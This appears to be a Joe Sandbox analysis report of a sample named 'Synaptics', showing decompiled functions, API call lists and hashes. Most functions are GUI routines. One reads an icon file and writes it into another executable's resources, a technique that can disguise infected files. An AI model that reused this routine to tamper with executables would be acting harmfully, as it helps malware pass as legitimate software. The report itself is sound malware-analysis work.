                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                                                                                                          • String ID: EnumDisplayMonitors
                                                                                                                                                                                          • API String ID: 362875416-2491903729
                                                                                                                                                                                          • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                          • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                                                                                                                                                          • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043F894 Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E0043F894(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0043E434(_t83) != 0) {
						_t38 = E0043F3B8(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00407638();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L004072D8();
					_v12 = _t47;
					L00407888();
					L004072E0();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E00441704(_t83),  &_v80);
					E0043C130(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E0043F894(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43f9e6, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L004072B8();
					EndPaint(E00441704(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43f9ed);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                                                                                                                                                                          0x0043f895
                                                                                                                                                                                          0x0043f897
                                                                                                                                                                                          0x0043f89c
                                                                                                                                                                                          0x0043f89d
                                                                                                                                                                                          0x0043f89f
                                                                                                                                                                                          0x0043f8a8
                                                                                                                                                                                          0x0043f8b4
                                                                                                                                                                                          0x0043f8d3
                                                                                                                                                                                          0x0043f8c1
                                                                                                                                                                                          0x0043f8c7
                                                                                                                                                                                          0x0043f8c7
                                                                                                                                                                                          0x0043f9f3
                                                                                                                                                                                          0x0043f8dd
                                                                                                                                                                                          0x0043f8df
                                                                                                                                                                                          0x0043f8ed
                                                                                                                                                                                          0x0043f8fb
                                                                                                                                                                                          0x0043f8fe
                                                                                                                                                                                          0x0043f903
                                                                                                                                                                                          0x0043f908
                                                                                                                                                                                          0x0043f90e
                                                                                                                                                                                          0x0043f915
                                                                                                                                                                                          0x0043f91a
                                                                                                                                                                                          0x0043f92a
                                                                                                                                                                                          0x0043f938
                                                                                                                                                                                          0x0043f947
                                                                                                                                                                                          0x0043f95c
                                                                                                                                                                                          0x0043f964
                                                                                                                                                                                          0x0043f96b
                                                                                                                                                                                          0x0043f972
                                                                                                                                                                                          0x0043f989
                                                                                                                                                                                          0x0043f997
                                                                                                                                                                                          0x0043f99d
                                                                                                                                                                                          0x0043f99e
                                                                                                                                                                                          0x0043f9a0
                                                                                                                                                                                          0x0043f9a3
                                                                                                                                                                                          0x0043f9b4
                                                                                                                                                                                          0x0043f9bb
                                                                                                                                                                                          0x0043f9be
                                                                                                                                                                                          0x0043f9c1
                                                                                                                                                                                          0x0043f9ce
                                                                                                                                                                                          0x0043f9d7
                                                                                                                                                                                          0x0043f9e5
                                                                                                                                                                                          0x0043f9e5

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 0043F8DF
                                                                                                                                                                                          • 73CCA520.GDI32(00000000,?), ref: 0043F903
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00000000,?), ref: 0043F90E
                                                                                                                                                                                          • 73CCA590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043F915
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0043F925
                                                                                                                                                                                          • BeginPaint.USER32(00000000,?,00000000,0043F9E6,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F947
                                                                                                                                                                                          • 73CD97E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F9A3
                                                                                                                                                                                          • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043F9B4
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0043F9CE
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0043F9D7
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0043F9E0
                                                                                                                                                                                            • Part of subcall function 0043F3B8: BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                            • Part of subcall function 0043F3B8: EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Paint$Object$BeginDeleteSelect$A520A590B380
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2363126454-0
                                                                                                                                                                                          • Opcode ID: 7b34ab99cf2695775398b7a9041d42a6f317b71157f33d2b82aebf26caa76fa5
                                                                                                                                                                                          • Instruction ID: 40ca658292be7ca8ad05904ab100b4ae2c2721b91c2ab7ac5fced72403dc647e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b34ab99cf2695775398b7a9041d42a6f317b71157f33d2b82aebf26caa76fa5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 14414E71F04204AFD704EBA9CD85B9EB7F8AF48304F50447AF909EB281DA78AD09CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00457244 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 144windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x45750c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E004397DC();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x49da70; // 0x422f48
					E00406A70(_t50,  &_v36);
					E0040D144(_v36, 1);
					E00404378();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x49ebb8; // 0x22b1714
				E004596E4(_t56);
				_push(_t127);
				_push(0x4574ef);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x49be70; // 0x0
				_v20 = _t60;
				_t61 =  *0x49ebbc; // 0x22b1320
				_t20 = _t61 + 0x78; // 0x0
				_t62 =  *0x49ebbc; // 0x22b1320
				_t21 = _t62 + 0x7c; // 0x22b1564
				E0041ACE8( *_t21,  *_t20, 0);
				_t65 =  *0x49ebbc; // 0x22b1320
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x49ebbc; // 0x22b1320
				_t24 = _t66 + 0x44; // 0x0
				_v22 =  *_t24;
				_t68 =  *0x49ebbc; // 0x22b1320
				E00458714(_t68,  *_t20, 0);
				_t70 =  *0x49ebbc; // 0x22b1320
				_t26 = _t70 + 0x48; // 0x0
				_v28 =  *_t26;
				_v16 = E00451600(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x4574cd);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00457194(_v8);
				_push(_t127);
				_push(0x45742c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x49ebb8; // 0x22b1714
					E0045A580(_t80, _t124, _t125);
					_t82 =  *0x49ebb8; // 0x22b1714
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004570F4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
				_t90 = E00441704(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x457433);
				return E0045718C();
			}





























                                                                                                                                                                                          0x00457244
                                                                                                                                                                                          0x00457244
                                                                                                                                                                                          0x00457244
                                                                                                                                                                                          0x00457245
                                                                                                                                                                                          0x00457247
                                                                                                                                                                                          0x0045724a
                                                                                                                                                                                          0x0045724b
                                                                                                                                                                                          0x0045724e
                                                                                                                                                                                          0x00457251
                                                                                                                                                                                          0x00457256
                                                                                                                                                                                          0x00457257
                                                                                                                                                                                          0x0045725c
                                                                                                                                                                                          0x0045725f
                                                                                                                                                                                          0x00457262
                                                                                                                                                                                          0x0045726e
                                                                                                                                                                                          0x00457297
                                                                                                                                                                                          0x0045729c
                                                                                                                                                                                          0x004572ab
                                                                                                                                                                                          0x004572b0
                                                                                                                                                                                          0x004572b0
                                                                                                                                                                                          0x004572bc
                                                                                                                                                                                          0x004572ca
                                                                                                                                                                                          0x004572ca
                                                                                                                                                                                          0x004572cf
                                                                                                                                                                                          0x004572d4
                                                                                                                                                                                          0x004572d9
                                                                                                                                                                                          0x004572e0
                                                                                                                                                                                          0x004572e1
                                                                                                                                                                                          0x004572e6
                                                                                                                                                                                          0x004572e9
                                                                                                                                                                                          0x004572ef
                                                                                                                                                                                          0x004572fb
                                                                                                                                                                                          0x004572fe
                                                                                                                                                                                          0x00457303
                                                                                                                                                                                          0x00457306
                                                                                                                                                                                          0x0045730b
                                                                                                                                                                                          0x0045730e
                                                                                                                                                                                          0x00457313
                                                                                                                                                                                          0x00457318
                                                                                                                                                                                          0x0045731d
                                                                                                                                                                                          0x00457325
                                                                                                                                                                                          0x00457328
                                                                                                                                                                                          0x0045732d
                                                                                                                                                                                          0x00457331
                                                                                                                                                                                          0x00457337
                                                                                                                                                                                          0x0045733c
                                                                                                                                                                                          0x00457341
                                                                                                                                                                                          0x00457346
                                                                                                                                                                                          0x00457349
                                                                                                                                                                                          0x00457353
                                                                                                                                                                                          0x00457358
                                                                                                                                                                                          0x00457359
                                                                                                                                                                                          0x0045735e
                                                                                                                                                                                          0x00457361
                                                                                                                                                                                          0x00457367
                                                                                                                                                                                          0x0045736e
                                                                                                                                                                                          0x0045736f
                                                                                                                                                                                          0x00457374
                                                                                                                                                                                          0x00457377
                                                                                                                                                                                          0x0045738c
                                                                                                                                                                                          0x00457396
                                                                                                                                                                                          0x0045739c
                                                                                                                                                                                          0x0045739c
                                                                                                                                                                                          0x004573a1
                                                                                                                                                                                          0x004573a6
                                                                                                                                                                                          0x004573b2
                                                                                                                                                                                          0x004573cd
                                                                                                                                                                                          0x004573d2
                                                                                                                                                                                          0x004573d2
                                                                                                                                                                                          0x004573b4
                                                                                                                                                                                          0x004573b7
                                                                                                                                                                                          0x004573b7
                                                                                                                                                                                          0x004573da
                                                                                                                                                                                          0x004573e0
                                                                                                                                                                                          0x004573e4
                                                                                                                                                                                          0x004573f9
                                                                                                                                                                                          0x00457401
                                                                                                                                                                                          0x0045740f
                                                                                                                                                                                          0x00457413
                                                                                                                                                                                          0x00457413
                                                                                                                                                                                          0x00457418
                                                                                                                                                                                          0x0045741b
                                                                                                                                                                                          0x0045741e
                                                                                                                                                                                          0x0045742b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCapture.USER32 ref: 004572B5
                                                                                                                                                                                          • GetCapture.USER32 ref: 004572C4
                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004572CA
                                                                                                                                                                                          • ReleaseCapture.USER32(00000000,0045750C), ref: 004572CF
                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 004572F6
                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0045738C
                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004573F9
                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 00457408
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                          • String ID: H/B
                                                                                                                                                                                          • API String ID: 862346643-184950203
                                                                                                                                                                                          • Opcode ID: 566df20a72b61cb5c56fc7dfe32d7b76f6e3c22f5e7dbfb110a8999abcf3f90f
                                                                                                                                                                                          • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 566df20a72b61cb5c56fc7dfe32d7b76f6e3c22f5e7dbfb110a8999abcf3f90f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043F510 Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0043F510(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E0041AC6C( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E00424950(0xff000010));
							E00419804( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E00424950(0xff000014));
							E00419804( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E0041ACC8(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E0041AC6C( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00419804( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E004398B8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E0043C130(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                                                                                                                                                                          0x0043f514
                                                                                                                                                                                          0x0043f517
                                                                                                                                                                                          0x0043f519
                                                                                                                                                                                          0x0043f51b
                                                                                                                                                                                          0x0043f524
                                                                                                                                                                                          0x0043f542
                                                                                                                                                                                          0x0043f542
                                                                                                                                                                                          0x0043f545
                                                                                                                                                                                          0x0043f54d
                                                                                                                                                                                          0x0043f632
                                                                                                                                                                                          0x0043f632
                                                                                                                                                                                          0x0043f63a
                                                                                                                                                                                          0x0043f73f
                                                                                                                                                                                          0x0043f73f
                                                                                                                                                                                          0x0043f73f
                                                                                                                                                                                          0x0043f643
                                                                                                                                                                                          0x0043f646
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f64d
                                                                                                                                                                                          0x0043f651
                                                                                                                                                                                          0x0043f653
                                                                                                                                                                                          0x0043f65b
                                                                                                                                                                                          0x0043f660
                                                                                                                                                                                          0x0043f669
                                                                                                                                                                                          0x0043f6a3
                                                                                                                                                                                          0x0043f6c6
                                                                                                                                                                                          0x0043f6d1
                                                                                                                                                                                          0x0043f6db
                                                                                                                                                                                          0x0043f6f0
                                                                                                                                                                                          0x0043f713
                                                                                                                                                                                          0x0043f71e
                                                                                                                                                                                          0x0043f728
                                                                                                                                                                                          0x0043f728
                                                                                                                                                                                          0x0043f72d
                                                                                                                                                                                          0x0043f72e
                                                                                                                                                                                          0x0043f72e
                                                                                                                                                                                          0x0043f72e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043f653
                                                                                                                                                                                          0x0043f553
                                                                                                                                                                                          0x0043f557
                                                                                                                                                                                          0x0043f560
                                                                                                                                                                                          0x0043f564
                                                                                                                                                                                          0x0043f566
                                                                                                                                                                                          0x0043f566
                                                                                                                                                                                          0x0043f564
                                                                                                                                                                                          0x0043f571
                                                                                                                                                                                          0x0043f577
                                                                                                                                                                                          0x0043f57d
                                                                                                                                                                                          0x0043f58a
                                                                                                                                                                                          0x0043f590
                                                                                                                                                                                          0x0043f5be
                                                                                                                                                                                          0x0043f5d0
                                                                                                                                                                                          0x0043f5d6
                                                                                                                                                                                          0x0043f5d8
                                                                                                                                                                                          0x0043f5d8
                                                                                                                                                                                          0x0043f5e4
                                                                                                                                                                                          0x0043f5f0
                                                                                                                                                                                          0x0043f602
                                                                                                                                                                                          0x0043f612
                                                                                                                                                                                          0x0043f61d
                                                                                                                                                                                          0x0043f622
                                                                                                                                                                                          0x0043f622
                                                                                                                                                                                          0x0043f5d0
                                                                                                                                                                                          0x0043f628
                                                                                                                                                                                          0x0043f629
                                                                                                                                                                                          0x0043f57d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 375863564-0
                                                                                                                                                                                          • Opcode ID: 286b09e57775301ddbe0bafa372678db3d75879f33f20f33257d17c33c013d91
                                                                                                                                                                                          • Instruction ID: 085781c14da3806a19508914d9dc02b8af2cdac2da7d1e5622b20ea0d846e8a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 286b09e57775301ddbe0bafa372678db3d75879f33f20f33257d17c33c013d91
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC516F71A04200ABD714EF69C8C5B5B77D8AF49308F04546AEE89CB397D738EC45CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00473930 Relevance: 15.1, APIs: 10, Instructions: 108fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00473930(CHAR* __eax, CHAR* __edx) {
				void _v40;
				void* _v44;
				long _v48;
				char _v52;
				CHAR* _v56;
				long _t60;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_v56 = __edx;
				_v52 = 0;
				_t66 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t66 > 0) {
					ReadFile(_t66,  &_v40, 0x16,  &_v48, 0);
					SetFilePointer(_t66, 0, 0, 0);
					_t65 = E0040275C(0x26);
					_t64 = E0040275C(0x22);
					_t59 = _t65;
					ReadFile(_t66, _t65, 0x26,  &_v48, 0);
					E004029DC(_t59, 0x14, _t64);
					 *((intOrPtr*)(_t64 + 6)) =  *((intOrPtr*)(_t65 + 6));
					 *((intOrPtr*)(_t64 + 0xa)) =  *((intOrPtr*)(_t65 + 0xa));
					 *(_t64 + 0xe) =  *(_t65 + 0xe);
					 *((short*)(_t64 + 0x12)) = 1;
					_t60 =  *(_t65 + 0xe);
					_v44 = E0040275C(_t60);
					SetFilePointer(_t66,  *(_t65 + 0x12), 0, 0);
					ReadFile(_t66, _v44, _t60,  &_v48, 0);
					CloseHandle(_t66);
					_t67 = BeginUpdateResourceA(_v56, 0);
					if(_t67 > 0) {
						UpdateResourceA(_t67, 3, 1, 0, _v44, _t60);
						EndUpdateResourceA(_t67, 0);
						_v52 = 1;
					}
					E0040277C(_v44);
					E0040277C(_t64);
					E0040277C(_t65);
				}
				return _v52;
			}













                                                                                                                                                                                          0x00473937
                                                                                                                                                                                          0x0047393a
                                                                                                                                                                                          0x00473957
                                                                                                                                                                                          0x0047395b
                                                                                                                                                                                          0x00473970
                                                                                                                                                                                          0x0047397c
                                                                                                                                                                                          0x0047398b
                                                                                                                                                                                          0x00473997
                                                                                                                                                                                          0x004739a2
                                                                                                                                                                                          0x004739a6
                                                                                                                                                                                          0x004739b4
                                                                                                                                                                                          0x004739bc
                                                                                                                                                                                          0x004739c2
                                                                                                                                                                                          0x004739c8
                                                                                                                                                                                          0x004739cb
                                                                                                                                                                                          0x004739d1
                                                                                                                                                                                          0x004739db
                                                                                                                                                                                          0x004739e8
                                                                                                                                                                                          0x004739fb
                                                                                                                                                                                          0x00473a01
                                                                                                                                                                                          0x00473a12
                                                                                                                                                                                          0x00473a16
                                                                                                                                                                                          0x00473a25
                                                                                                                                                                                          0x00473a2d
                                                                                                                                                                                          0x00473a32
                                                                                                                                                                                          0x00473a32
                                                                                                                                                                                          0x00473a3b
                                                                                                                                                                                          0x00473a42
                                                                                                                                                                                          0x00473a49
                                                                                                                                                                                          0x00473a49
                                                                                                                                                                                          0x00473a59

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0049A0E3,00000000,0049A352), ref: 00473952
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000,00000000), ref: 00473970
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0047397C
